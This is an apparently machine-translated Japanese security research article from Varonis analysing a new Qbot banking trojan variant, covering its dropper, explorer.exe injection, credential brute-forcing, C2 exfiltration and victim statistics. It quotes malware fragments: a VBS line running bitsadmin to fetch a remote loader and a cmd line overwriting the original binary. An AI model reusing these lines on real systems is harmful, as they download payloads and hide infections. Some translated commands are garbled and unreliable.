Qbotが垰っおきたした。 Varonisは、銀行のトロむの朚銬Qbotの詳现な分析を導入したした

Varonis Safety Research Groupの発芋ず調査

新しい皮類のマルりェアを䜿甚したグロヌバルなサむバヌ攻撃

Qbot゜フトりェア。 キャンペヌンは積極的にアメリカの䌁業をタヌゲットにしおいたすが、䞖界䞭のネットワヌクを攻撃し、ペヌロッパ、アゞア、ロシア、南アメリカの至る所で被害を受け、銀行口座の資栌情報を含む機密の財務情報を盗みたした。









分析䞭に、このQbotのバリ゚ヌションのコヌドを解析し、動䜜䞭の攻撃制埡コマンドセンタヌを特定したした。これにより、感染の皋床を刀断できたした。 C2サヌバヌを盎接芳察したずころ、䞖界䞭の数千人の被害者がすでに䟵害されおおり、攻撃者によっお積極的に監芖されおいるこずが明らかになりたした。 CCサヌバヌで芋぀かった远加情報は、このキャンペヌンの背埌にある盎接の参加者の痕跡も明らかにしたした。



攻撃は元々 Varonis DatAlertによっお発芋されたした。

北米の顧客。 Varonis DatAlertは、疑わしい゜フトりェアのダりンロヌド、セキュリティ境界内の移動内郚の暪方向の動き、および疑わしいネットワヌクアクティビティに぀いお譊告したした。



私たちのチヌムは珟圚、この事件を調査しおいる圓局ず積極的に協力しおおり、远加の非公開情報を提䟛しおいたす。 この蚘事では、開瀺が蚱可されおいる情報を共有したす。



バンキングマルりェアQbotの新しいバヌゞョン



この悪意のあるキャンペヌンの運営者は、銀行の資栌情報を盗むように蚭蚈された有名で掗緎されたマルりェアであるQbotの新しいバヌゞョンを䜿甚したした。 Qbotは高床なアンチ分析手法を䜿甚し、倚くの堎合、怜出から遠ざかり、新しい感染ベクタヌを䜿甚しお、利甚可胜な保護察策を先取りしたす。



マルりェアは倚態性であり、垞に倉化しおいたす。





QbotたたはQakbotは2009幎に初めお特定され、それ以来倧幅に進化しおいたす。 䞻に、オンラむンむンタヌネットセッションからのデヌタず金融Webサむトに関連するデヌタを収集するこずを目的ずしおいたす。 そのネットワヌクワヌム機胜により、組織のネットワヌクを介しお拡散し、他のシステムに感染するこずができたす。



発芋



私たちのチヌムは、顧客からの電話の埌で調査を開始したした。そこでは、既に実装されおいるDatAlertがシステムでの疑わしい掻動に぀いお譊告したした。 調査の結果、

少なくずも1台のコンピュヌタヌがマルりェアに感染しおおり、他のネットワヌクサヌバヌぞの拡散の詊みが怜出されおいたす。



ワヌムのサンプルが抜出され、分析のためにVaronis研究チヌムに送られたした。 このパタヌンは既存のハッシュず䞀臎せず、さらなる調査により、それが新しい株であるこずが明らかになりたした。



ステヌゞ1ドロッパヌ



ファむル名REQ_02132019b.doc.vbs







Qbotの以前のバヌゞョンでは、Word文曞内の被害者のコンピュヌタヌでマクロが実行されおいたした。 調査の過皋で、拡匵子が.doc.vbsのzipファむルも怜出されたした。これは、最初の感染がおそらく

フィッシングメヌル。悪意のあるスクリプトVBSVisual Basic Sc​​riptの発信元。



VBSは、実行されるず、犠牲のオペレヌティングシステムバヌゞョンを識別し、むンストヌルされたアンチりむルス゜フトりェアの怜出を詊みたす。 マルりェアは、Defender、Virus、Antivirus、Malw、Trend、Kaspersky、Kav、McAfee、Symantecの行を探したす。



新しいバヌゞョンでは、マルりェアはBITSAdminを䜿甚しおブヌトロヌダヌをダりンロヌドしたす。 PowerShellは以前のバヌゞョンのマルりェアで䜿甚されおいたため、これは新しい動䜜です。



BITSAdminは、次のサむトのいずれかからブヌトロヌダヌをダりンロヌドしたす。







次に、BITSAdminを䜿甚しおブヌトロヌダヌをダりンロヌドするためのVBSコヌドを瀺したす。



intReturn = wShell.Run ('bitsadmin / transfer qahdejob' & Second (Now) & '/ Priority HIGH '& el & urlStr ' ' & tempFile, 0, True)
      
      





第2段階足堎を築き、explorer.exeでルヌトを取埗する



ファむル名widgetcontrol.png







悪意のあるプログラムのカヌネルを含むブヌトロヌダヌにはいく぀かのバヌゞョンがあり、実行埌も垞に曎新されたす。 感染時に被害者が受け取るバヌゞョンは、VBSファむルにハヌドコヌドされおいるspパラメヌタヌによっお異なりたす。



悪意のある機胜は、ブヌトロヌダヌの各バヌゞョンが異なるデゞタル蚌明曞で眲名されるこずです。 信頌できる蚌明曞は通垞、ファむルが信頌されおいるこずを瀺したすが、眲名されおいない実行可胜ファむルは疑わしいものです。



Qbotは、停造たたは盗たれた有効なデゞタル蚌明曞を䜿甚しお信頌性を高め、オペレヌティングシステムでの怜出を回避するこずが知られおいたす。



利甚可胜なすべおのバヌゞョンのブヌトロヌダヌをダりンロヌドし䞋蚘の䟵害の兆候を参照、蚌明曞を比范したした。



マルりェアが䜿甚する蚌明曞





蚌明曞の1぀の䟋







留め具



初回起動時に、ブヌトロヌダヌは自身をAppdata\ Roaming \ {Random line}にコピヌし、次を䜜成したす。





感染したExplorer.exe



ブヌトロヌダヌは、32ビットのexplorer.exe゚クスプロヌラヌプロセスを起動し、そこに挿入したす

メむンペむロヌド。



ペむロヌドがすでにRWXメモリセグメントずしおむンストヌルされおいるexplorer.exeプロセスのダンプを次に瀺したす。







展開埌、ブヌトロヌダヌは元の実行可胜ファむルをcalc.exeの32ビットバヌゞョンで䞊曞きしたす。



"C\ Windows \ System32 \ cmd.exe" / c ping.exe-N 6 127.0.0.1タむプ "C\ Windows \ System32 \ calc.exe"> C\ナヌザヌ\ {TKTKTK} \デスクトップ\ 1 .exe



ステヌゞ3静かにこっそりずお金を盗む



システムで修正された埌、ブルヌトフォヌスモゞュヌルはネットワヌク䞊でパスワヌドずアカりントの゜ヌトを開始したす。 マルりェアがドメむンアカりントを䟵害した堎合、Domain Usersグルヌプのナヌザヌのリストを読み取り、これらのアカりントの゜ヌトを開始したす。 ロヌカルアカりントが䟵害された堎合、マルりェアは、ロヌカルナヌザヌの事前蚭定枈みの暙準リストを䜿甚したす。 認蚌の詊行では、NTLMずWNetAddConnection APIを䜿甚したす。



ロヌカルアカりントを反埩凊理するずきにマルりェアが䜿甚するナヌザヌ名ずパスワヌドを抜出したした こちら 。 悪意のあるプログラムはこれらの蟞曞を静的分析から隠したすが、実行時に抜出できたす。



X32dbg゚クスプロヌラヌ゚クスプロヌラヌむメヌゞ。管理者ナヌザヌずパスワヌド12345678でリモヌトコンピュヌタヌぞの接続を詊みたす。







あなたのお金を運ぶ



Qbotの䞻な目暙は、被害者からのお金の盗難です。 圌はいく぀かの方法を䜿甚しお、財務、䌚蚈、その他の情報を盗み、攻撃者のサヌバヌに送信したす。





次の図は、銀行のりェブサむトbuisnessline.huntington.comでの認蚌䞭に、悪意のあるプログラムがPOSTリク゚ストずセッションCookieのデヌタをC2サヌバヌcontent.bigflimz.comに送信するこずを瀺しおいたす。







C2攻撃者サヌバヌ内



攻撃者のサむトの1぀で、被害者のIPアドレス、オペレヌティングシステムに関する情報、およびりむルス察策補品の名前を含むログファむルを芋぀けるこずができたした。 C2サヌバヌは、過去の攻撃に関する情報ず、マルりェアの远加バヌゞョン䞋蚘の䟵害むンゞケヌタセクションのバヌゞョンの衚を瀺したした。







䞀郚の結果には重耇が含たれる堎合がありたすが、以䞋は怜出された䞊䜍10か囜、りむルス察策補品、およびオペレヌティングシステムです。 たた、攻撃の犠牲者はロシアの倧芏暡な金融機関であったこずも知られおいたす。



すべおのデヌタはGithubリポゞトリにアップロヌドされたす 。



2,726の䞀意の被害者IPが芋぀かりたした。 倚くの組織では、内郚IPアドレス、被害者の数、

おそらくもっずたくさんあるでしょう。



囜別の被害者

図囜による犠牲者



オペレヌティングシステム別の被害者

図オペレヌティングシステム別の被害者



䜿甚されるりむルス察策による被害者

図䜿甚されるりむルス察策による被害者



䟵害むンゞケヌタ



䟵害のすべおの指暙は、 こちらの Github で芋぀けるこずができたす 。



ブヌトロヌダヌのバヌゞョン

完党なリストはここにありたす 。



All Articles